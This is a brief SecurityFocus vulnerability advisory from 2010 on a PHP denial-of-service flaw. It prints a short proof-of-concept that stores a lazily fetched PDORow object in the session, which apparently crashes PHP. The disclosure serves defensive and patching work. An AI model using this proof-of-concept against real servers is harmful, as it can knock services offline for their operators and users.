PHP PDORow Object Remote Denial Of Service Vulnerability

The following proof-of-concept is available:

<?php

// make a Pdo_Mysql statement before

$result = $stmt->fetch(PDO::FETCH_LAZY);

session_start();

$_SESSION['PDORow'] = $result;
?>


 

Privacy Statement
Copyright 2010, SecurityFocus